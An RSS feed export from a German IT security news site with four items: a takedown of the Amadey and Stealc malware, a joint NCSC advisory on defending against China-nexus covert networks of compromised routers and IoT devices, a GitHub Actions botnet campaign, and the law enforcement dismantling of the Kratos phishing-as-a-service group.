<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=mmd00472015+sshv+bruter+botnet%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 01:44:29 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 01:44:29 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=mmd00472015+sshv+bruter+botnet%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=mmd00472015+sshv+bruter+botnet%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[ESET takes part in Operation Endgame to disrupt Amadey and Stealc]]></title>
<description><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights]]></description>
<link>https://tsecurity.de/de/3694642/malware-trojaner-viren/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694642/malware-trojaner-viren/eset-takes-part-in-operation-endgame-to-disrupt-amadey-and-stealc/</guid>
<pubDate>Sat, 25 Jul 2026 19:04:30 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ESET researchers assisted in the global disruption of the Amadey botnet and Stealc infostealer, providing technical analysis, infrastructure tracking, and affiliate-level insights]]></content:encoded>
</item>
<item>
<title><![CDATA[Defending Against China-Nexus Covert Networks of Compromised Devices]]></title>
<description><![CDATA[Defending against china-nexus covert networks of compromised devices
executive summary
Defending against China-nexus covert networks of compromised devices 
Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defe...]]></description>
<link>https://tsecurity.de/de/3693378/sicherheitsluecken/defending-against-china-nexus-covert-networks-of-compromised-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693378/sicherheitsluecken/defending-against-china-nexus-covert-networks-of-compromised-devices/</guid>
<pubDate>Sat, 25 Jul 2026 09:10:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="SCXW131754345 BCX8">
<div class="OutlineElement Ltr SCXW131754345 BCX8">
<h2><a class="c-button c-button--on-dark" href="https://urldefense.us/v3/__https://www.ncsc.gov.uk/news/defending-against-china-nexus-covert-networks-of-compromised-devices__;!!BClRuOV5cvtbuNI!Cvg8stIR3jHWVZgHhCVvEwbwDXxXIRSprOQ9JtY2YKwxUIGVovuDAu7QrFsfw3sfAVd8-gxEMIpgldwlY-jTD7G0%24">Defending against china-nexus covert networks of compromised devices</a></h2>
<h2><a class="c-button c-button--on-dark" href="https://urldefense.us/v3/__https://www.ncsc.gov.uk/news/executive-summary-defending-against-china-nexus-covert-networks-of-compromised-devices__;!!BClRuOV5cvtbuNI!Cvg8stIR3jHWVZgHhCVvEwbwDXxXIRSprOQ9JtY2YKwxUIGVovuDAu7QrFsfw3sfAVd8-gxEMIpgldwlYzP90Ign%24">executive summary</a></h2>
<h2><strong>Defending against China-nexus covert networks of compromised devices </strong></h2>
<p>Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it </p>
<h3><strong>Summary</strong></h3>
<p>With support from the UK <a href="https://www.ncsc.gov.uk/information/cyber-league" target="_blank"><u>Cyber League</u></a>, this advisory has been jointly released by the National Cyber Security Centre (NCSC-UK) and international partners: </p>
<ul>
<li>Australian Signals Directorate’s (ASD’s) Australian Cyber Security Centre (ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>Germany Federal Office for the Protection of the Constitution -   Bundesamt für Verfassungsschutz (BfV)</li>
<li>Germany Federal Intelligence Service – Bundesnachrichtendienst (BND)</li>
<li>Germany Federal Office for Information Security - Bundesamt für Sicherheit in der Informationstechnik (BSI)</li>
<li>Japan National Cybersecurity Office (NCO) - 国家サイバー統括室</li>
<li>Netherlands General Intelligence and Security Service - Algemene Inlichtingen- en Veiligheidsdienst (AIVD)</li>
<li>Netherlands Defence Intelligence and Security Service - Militaire Inlichtingen- en Veiligheidsdienst (MIVD)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>Spain National Cryptologic Centre – Centro Criptológico Nacional (CCN)</li>
<li>Sweden National Cyber Security Centre - Nationellt cybersäkerhetscenter (NCSC-SE)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>United States National Security Agency (NSA) </li>
</ul>
<p>Its purpose is to provide network defenders with the tools needed to defend against China-nexus cyber actors and their tactic of using large scale networks of compromised devices (covert networks) to route their cyber activity. </p>
<h3><strong>Introduction  </strong></h3>
<p>Over the past few years there has been a major shift in the tactics, techniques and procedures (TTPs) used by China-nexus cyber actors, moving away from the use of individually procured infrastructure, and towards the use of externally provisioned, large-scale networks of compromised devices. </p>
<div class="OutlineElement Ltr SCXW149482171 BCX8">
<p>The NCSC believes that the majority of China-nexus threat actors are using these networks (hereafter “covert networks”), that multiple covert networks have been created and are being constantly updated, and that a single covert network could be being used by multiple actors. These networks are mainly made up of compromised Small Office Home Office (SOHO) routers, as well as Internet of Things (IoT) and smart devices. </p>
</div>
<div class="OutlineElement Ltr SCXW149482171 BCX8">
<p>Anyone who is a target of China-nexus cyber actors may be impacted by the use of covert networks. They have been <a href="https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-warning-about-state-sponsored-cyber-attackers-hiding-on-critical-infrastructure-networks" target="_blank"><u>used by Chinese state-sponsored actors Volt Typhoon</u></a> to pre-position offensive cyber capabilities on critical national infrastructure. The group <a href="https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-advice-to-counter-china-linked-campaign-targeting-thousands-of-devices" target="_blank"><u>Flax Typhoon used a different covert network</u></a> of compromised infrastructure to conduct cyber espionage. </p>
</div>
<div class="OutlineElement Ltr SCXW149482171 BCX8">
<p>The use of covert networks of compromised devices - also known as botnets - to facilitate malicious cyber activity is not new, but China-nexus cyber actors are now using them strategically, and at scale.  </p>
</div>
<div class="OutlineElement Ltr SCXW149482171 BCX8">
<p>This advisory describes the typical makeup of a covert network and what they are being used for. It also includes protective advice for organizations being targeted by cyber activity using a covert network as an access vector.</p>
<h3><strong>Covert Networks </strong></h3>
<p>Covert networks are used to connect across the internet in a low-cost, low-risk, deniable way, disguising the origin and attribution of malicious activity. Actors have been observed using them for each phase of their Cyber Kill Chains, from performing scans as part of reconnaissance, to the delivery of malware, communicating with said malware, and exfiltrating stolen data from a victim. They can also be used for general deniable internet browsing, allowing threat actors to research exploitation techniques, new TTPs, and their victims without attribution. Some covert networks are also used by legitimate customers to browse the internet, making it challenging to attribute malicious activity. </p>
<div class="OutlineElement Ltr SCXW53561783 BCX8">
<p>There is evidence that covert networks used by China-nexus actors are created and maintained by Chinese information security companies. A network known to network defenders as Raptor Train, which in 2024 infected more than 200,000 devices worldwide, was controlled and managed by the Chinese company, Integrity Technology Group. This company was also <a href="https://www.justice.gov/archives/opa/pr/court-authorized-operation-disrupts-worldwide-botnet-used-peoples-republic-china-state" target="_blank"><u>assessed by the FBI</u></a> to be responsible for the computer intrusion activities attributed to China-based hackers known as Flax Typhoon. </p>
</div>
<div class="OutlineElement Ltr SCXW53561783 BCX8">
<blockquote>
<p><strong>Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyber attacks – NCSC Director of Operations, Paul Chichester </strong></p>
</blockquote>
</div>
<div class="OutlineElement Ltr SCXW53561783 BCX8">
<p>Covert networks mostly consist of compromised SOHO routers, but they also pull in any vulnerable device they can exploit at scale. Raptor Train was made up of thousands of SOHO routers and IoT devices, such as web cameras and video recorders, as well as firewalls and Network Attached Storage (NAS) devices. The KV Botnet used by Volt Typhoon <a href="https://www.justice.gov/archives/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical" target="_blank"><u>was mainly made up of vulnerable Cisco and NetGear routers</u></a>. The edge devices were vulnerable because they were “end of life” – out of date and no longer receiving updates or security patches by their manufacturers. </p>
</div>
<div class="OutlineElement Ltr SCXW53561783 BCX8">
<p>The cyber security industry has been aware of examples of these networks for some time and has publicly reported on the widespread scale of the threat and its implications. Mandiant Intelligence produced a <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks" target="_blank"><u>public blog in May 2024</u></a> talking about covert networks in which they highlighted a key issue for defenders – indicator of compromise (IOC) Extinction. If a particular threat group could now come from one of many covert networks, each with potentially hundreds of thousands of endpoints, and each used by multiple threat actors, old network defense paradigms of static malicious IP block lists will be less effective. This is compounded by the dynamic nature of these networks where new nodes will be added as old devices are patched or removed from use. </p>
<h3><strong>Typical Network Topology</strong></h3>
<p>The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed. The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network. </p>
<div class="OutlineElement Ltr SCXW21942648 BCX8">
<p>Because of this, a description of all known covert networks in detail, including how they are constructed and how they communicate, would immediately be out of date – and for most network defenders would not be practically useful. </p>
</div>
<div class="OutlineElement Ltr SCXW21942648 BCX8">
<p>However, most covert networks of compromised devices use the same basic set up. Understanding this generalized structure can aid researchers and defenders by helping them to understand which part of a network they may have found, and how to defend against it. </p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-04/A%20diagram%20illustrating%20the%20basic%20setup%20of%20a%20covert%20network..png?itok=3Bfm4nKj" width="1024" height="877" alt="A diagram illustrating the basic setup of a covert network.">



</div>
      <figcaption class="c-figure__caption">A diagram illustrating the basic setup of a covert network.</figcaption>
  </figure>
<div class="OutlineElement Ltr SCXW75515976 BCX8">
<p>The diagram above illustrates the basic setup of a covert network, where typically an actor will connect to the network via an on-ramp or entry node. Their traffic will be forwarded through multiple compromised devices, used as traversal nodes, before exiting the network from an exit node, usually in the same geographic region as the target. </p>
<h3><strong>Protective Advice </strong></h3>
<p>Defending from attackers using covert networks is not straightforward, and defensive tactics will be different based on the levels of resource and the nature of the target organization. General advice for good cyber security practice should be followed, and some key messages can be found in the appendix of this advisory.  </p>
</div>
<div class="OutlineElement Ltr SCXW75515976 BCX8">
<p>The following advice is specifically tailored to steps which can be taken to combat the risk of attacks coming from large, dynamic networks of compromised devices. </p>
</div>
<div class="OutlineElement Ltr SCXW75515976 BCX8">
<p>Further guidance for all organizations facing cyber security threats is available on the NCSC website. </p>
<p><em>This guidance should be considered alongside all applicable laws and regulations of the UK and co-sealing countries relating to the security of networks and data. It will be each organization’s responsibility to ensure compliance with any such laws and regulations. Organizations should note that following the recommended actions set out below will not remove all risks.</em></p>
<h4><strong>All organizations</strong></h4>
<div class="OutlineElement Ltr SCXW75515976 BCX8">
<p>The NCSC recommends the following steps for all affected organizations to either take themselves, or ask their managed service and/or security providers to investigate for them: </p>
<ul>
<li>Map and understand network edge devices, developing a clear understanding of organizational assets and what should be connecting to them.</li>
<li>Baseline normal connections, especially to corporate virtual private networks (VPNs) or other similar services.
<ul>
<li>Would you expect connections from consumer broadband ranges?</li>
</ul>
</li>
<li>Leverage available dynamic threat feeds which include covert network infrastructure.</li>
<li>Implement multifactor authentication for remote connections.</li>
</ul>
<p>Smaller organizations should consider creating and actioning a <a href="https://cybertoolkit.service.ncsc.gov.uk/" target="_blank"><u>free NCSC Cyber Action Toolkit</u></a>. </p>
<h4><strong>Larger or more at-risk organizations</strong></h4>
<div class="SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Some more comprehensive measures may be appropriate if the risk to an organization is high enough, to be conducted either in-house or through a security provider:  </p>
<ul>
<li>Apply IP address allow lists rather than deny lists for connections to corporate VPNs for remote workers.</li>
<li>Use geographic allow lists or profile incoming connections based on operating system, time zones, and/or organization specific system configuration settings.</li>
<li>Implement zero trust policies for connections.</li>
<li>Enforce machine certificates for Secure Sockets Layer (SSL) connections.</li>
<li>Reduce the internet-facing presence of the IT estate.</li>
<li>Investigate machine learning techniques to profile normal network edge activity to detect and block anomalies. </li>
</ul>
<p><a href="https://www.ncsc.gov.uk/cyberessentials/overview" target="_blank"><u>The NCSC's Cyber Essentials</u></a> can help protect organizations of all sizes. </p>
<h4><strong>Largest or most at-risk organizations</strong> </h4>
<p>If Advanced Persistent Threat (APT) tracking is part of an organization’s in-house capability, or if it is part of the service provided by a security vendor, consider tracking China-nexus covert networks as APTs in their own right.</p>
<ul>
<li>Active hunting – look for connections from IP addresses likely to be part of a covert network of compromised devices, for instance those hosting SOHO routers or IoT devices.</li>
<li>Track and map covert networks reported by industry or government by looking at banners and certificates.</li>
<li>Use threat reporting and threat feeds to create and implement dynamic blocklists and create alert rules to detect incoming threats.</li>
<li>Consider using NetFlow feeds to look upstream and map covert networks to find new nodes. </li>
</ul>
<p>The <a href="https://www.ncsc.gov.uk/collection/cyber-assessment-framework" target="_blank"><u>NCSC Cyber Assessment Framework</u></a> provides guidance for organizations under the highest levels of threat, including those operating essential services, in sectors such as energy, healthcare, transport, digital infrastructure and government.  </p>
<h3><strong>MITRE ATT&amp;CK® </strong></h3>
<p>This advisory has been compiled with respect to the MITRE ATT&amp;CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. </p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p class="text-align-justify"><strong>Tactic </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p class="text-align-justify"><strong>ID </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p class="text-align-justify"><strong>Technique </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p class="text-align-justify"><strong>Procedure </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><strong>Resource Development </strong></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><a href="https://attack.mitre.org/versions/v18/techniques/T1584/005/" target="_blank"><u>T1584.005</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Compromise Infrastructure: Botnet </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Botnets are used as core components of covert networks </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><strong>Resource Development </strong></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><a href="https://attack.mitre.org/versions/v18/techniques/T1584/008/" target="_blank"><u>T1584.008</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Compromise Infrastructure: Network Devices </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Devices are compromised and added to botnets </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><strong>Resource Development </strong></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><a href="https://attack.mitre.org/versions/v18/techniques/T1583/003/" target="_blank"><u>T1583.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Acquire Infrastructure: Virtual Private Server </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Virtual private servers (VPS) are used in covert networks, typically as on-ramps </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><strong>Command and Control </strong></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p><a href="https://attack.mitre.org/versions/v18/techniques/T1090/003/" target="_blank"><u>T1090.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Proxy: Multi-hop Proxy </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Used by China-nexus cyber actors to route traffic </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="SCXW242856196 BCX8">
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<h3> <strong>Appendix: Cyber Security Best Practices </strong></h3>
<p>In addition to the protective advice outlined in this advisory, a number of cyber security best practices will also be useful in defending against the activity described in this advisory. </p>
<ul>
<li><strong>Protect your devices and networks by keeping them up to date</strong>: use the latest supported versions, apply security updates promptly, use antivirus and scan regularly to guard against known malware threats. See NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software" target="_blank"><u>https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software</u></a></li>
<li><strong>Prevent and detect lateral movement in your organization’s networks</strong>. See NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/preventing-lateral-movement" target="_blank"><u>https://www.ncsc.gov.uk/guidance/preventing-lateral-movement</u></a></li>
<li><strong>Implement architectural controls for network segregation</strong>. See NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/10-steps-network-security" target="_blank"><u>https://www.ncsc.gov.uk/guidance/10-steps-network-security</u></a></li>
<li><strong>Set up a security monitoring</strong> <strong>capability</strong> so you are collecting the data that will be needed to analyze network intrusions. See NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes" target="_blank"><u>https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes</u></a> and <a href="https://www.ncsc.gov.uk/information/logging-made-easy" target="_blank"><u>https://www.ncsc.gov.uk/information/logging-made-easy</u></a></li>
<li><strong>Use modern systems and software.</strong> These have better security built-in. If you cannot move off out-of-date platforms and applications straight away, there are short term steps you can take to improve your position. See NCSC Guidance:  <a href="https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products" target="_blank"><u>https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products</u></a></li>
<li><strong>Restrict intruders' ability to move freely around your systems and networks</strong>. Pay particular attention to potentially vulnerable entry points such as third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/preventing-lateral-movement" target="_blank"><u>https://www.ncsc.gov.uk/guidance/preventing-lateral-movement</u></a> and <a href="https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security" target="_blank"><u>https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security</u></a><u>.</u></li>
<li><strong>Deploy a host-based intrusion detection system</strong>. A variety of products are available, free and paid-for, to suit different needs and budgets.</li>
<li><strong>Further information</strong>: Invest in preventing malware-based attacks across various scenarios.  See NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks" target="_blank"><u>https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks</u></a> </li>
</ul>
<h4><strong>Disclaimer </strong> </h4>
<p>This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by co-sealers. UK readers should refer to the NCSC website for information about <a href="https://www.ncsc.gov.uk/section/products-services/assured-services" target="_blank"><u>NCSC assured services</u></a>. </p>
</div>
</div>
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.  </p>
</div>
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>Refer any FOIA queries to <a href="mailto:ncscinfoleg@ncsc.gov.uk" target="_blank"><u>ncscinfoleg@ncsc.gov.uk</u></a>.  </p>
</div>
<div class="OutlineElement Ltr SCXW242856196 BCX8">
<p>All material is UK Crown Copyright © </p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Turn GitHub Actions Into a Global Botnet for Attacking Web Hosting Servers]]></title>
<description><![CDATA[Hackers are abusing compromised GitHub repositories and GitHub Actions workflows to build a de facto global botnet that scans and exploits web hosting servers, with a primary focus on cPanel and WHM deployments. The campaign first surfaced when malicious development…
Read more →
The post Hackers ...]]></description>
<link>https://tsecurity.de/de/3688889/it-security-nachrichten/hackers-turn-github-actions-into-a-global-botnet-for-attacking-web-hosting-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688889/it-security-nachrichten/hackers-turn-github-actions-into-a-global-botnet-for-attacking-web-hosting-servers/</guid>
<pubDate>Thu, 23 Jul 2026 13:44:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers are abusing compromised GitHub repositories and GitHub Actions workflows to build a de facto global botnet that scans and exploits web hosting servers, with a primary focus on cPanel and WHM deployments. The campaign first surfaced when malicious development…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-turn-github-actions-into-a-global-botnet-for-attacking-web-hosting-servers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-turn-github-actions-into-a-global-botnet-for-attacking-web-hosting-servers/">Hackers Turn GitHub Actions Into a Global Botnet for Attacking Web Hosting Servers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Turn GitHub Actions Into a Global Botnet for Attacking Web Hosting Servers]]></title>
<description><![CDATA[Hackers are abusing compromised GitHub repositories and GitHub Actions workflows to build a de facto global botnet that scans and exploits web hosting servers, with a primary focus on cPanel and WHM deployments. The campaign first surfaced when malicious development versions were discovered acros...]]></description>
<link>https://tsecurity.de/de/3688856/it-security-nachrichten/hackers-turn-github-actions-into-a-global-botnet-for-attacking-web-hosting-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688856/it-security-nachrichten/hackers-turn-github-actions-into-a-global-botnet-for-attacking-web-hosting-servers/</guid>
<pubDate>Thu, 23 Jul 2026 13:27:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers are abusing compromised GitHub repositories and GitHub Actions workflows to build a de facto global botnet that scans and exploits web hosting servers, with a primary focus on cPanel and WHM deployments. The campaign first surfaced when malicious development versions were discovered across ten Packagist PHP packages tied to a legitimate PHP and DevOps […]</p>
<p>The post <a href="https://gbhackers.com/github-actions-into-a-global-botnet/">Hackers Turn GitHub Actions Into a Global Botnet for Attacking Web Hosting Servers</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[German law enforcement claims to have ‘dismantled’ mega phishing-as-a-service group Kratos]]></title>
<description><![CDATA[A global law enforcement crackdown has seized infrastructure serving the massive phishing-as-a-service (PhaaS) group Kratos, as well resulting in the arrest of an unnamed Kratos “developer and technical administrator” in Indonesia. 



The effort was managed by German law enforcement and involved...]]></description>
<link>https://tsecurity.de/de/3687784/it-security-nachrichten/german-law-enforcement-claims-to-have-dismantled-mega-phishing-as-a-service-group-kratos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687784/it-security-nachrichten/german-law-enforcement-claims-to-have-dismantled-mega-phishing-as-a-service-group-kratos/</guid>
<pubDate>Thu, 23 Jul 2026 01:57:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A global law enforcement crackdown has seized infrastructure serving the massive phishing-as-a-service (PhaaS) group Kratos, as well resulting in the arrest of an unnamed Kratos “developer and technical administrator” in Indonesia. </p>



<p class="wp-block-paragraph">The effort was managed by German law enforcement and involved agencies from the US, Indonesia and other countries.</p>



<p class="wp-block-paragraph">Although a <a href="https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2026/Presse2026/260720_PM_Kratos.html" target="_blank" rel="noreferrer noopener">German statement</a> claimed that the Kratos infrastructure “has been completely disabled” and that “Kratos-supported phishing campaigns can no longer be carried out,” cybersecurity analysts and consultants question how much of a dent in enterprise phishing activity will result, and how long it will last.</p>



<p class="wp-block-paragraph">“A server seizure and a single arrest overseas remove infrastructure, not the intellectual property,” said <a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC. “PhaaS kits get cloned, forked and resold routinely, and the 1,800 Kratos customers didn’t vanish. They just lost a vendor in a market where vendors get replaced fast.”</p>



<p class="wp-block-paragraph">He added, “seizing 200-plus servers and arresting the developer pulls a major supplier out of that specific niche. It doesn’t touch the broader phishing economy. For every roach that you squish, there are a hundred that you do not see.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520, takes an even more pessimistic view, arguing that there might not even be that much of a short-term phishing slowdown. </p>



<p class="wp-block-paragraph">“What makes this different from a botnet or ransomware takedown is that the people running the attacks were never part of the organization. Kratos was just a vendor,” Kenney said. “The 1,800 customers who bought it still have their target lists, their sending infrastructure and whatever access they had already established. The tooling went dark, but the people phishing your employees last week are still working, shopping for a replacement that already exists. Enterprises should not read this as a drop in (likely) threat volume.”</p>



<p class="wp-block-paragraph">One thing that the security community seems to agree on is that Kratos was a major player in the lucrative PhaaS space. But precisely determining the percentage of PhaaS activity controlled by Kratos is impossible, given that Kratos sold their kits to others. Security researchers even disagree on what they should call Kratos kits.</p>



<p class="wp-block-paragraph">“Microsoft tracks this kit as SneakyLog, others tie it to Sneaky 2FA, and KnowBe4 disputes the lineage entirely. When the security industry cannot agree on what a kit is to be called, that is because renaming and reselling is continuous rather than something that happens after a raid,” Kenney said. “What actually changed this time is the arrest and the [shutdown of the] servers. Standing up new hosting is only a weekend of work, but replacing a developer who understood how to keep an adversary in the middle proxy stable and evasive at scale is harder.”</p>



<p class="wp-block-paragraph">IDC’s Dickson added that the biggest value from the takedown is in the information gleaned from the seized servers. </p>



<p class="wp-block-paragraph">“Kratos operated in the adversary-in-the-middle category, generating convincing fake Microsoft 365 login pages that harvest session tokens and step past MFA, the exact technique behind a lot of the business email compromise activity of the past two years,” he said. “I would love to see what law enforcement does with the customer list. That, my friend, is gold.”</p>



<p class="wp-block-paragraph">Regardless, <a href="https://www.linkedin.com/in/assafmo/" target="_blank" rel="noreferrer noopener">Assaf Morag</a>, a cybersecurity researcher at Flare, dubbed the German crackdown “symbolic,” given Kratos’ reach within phishing circles. </p>



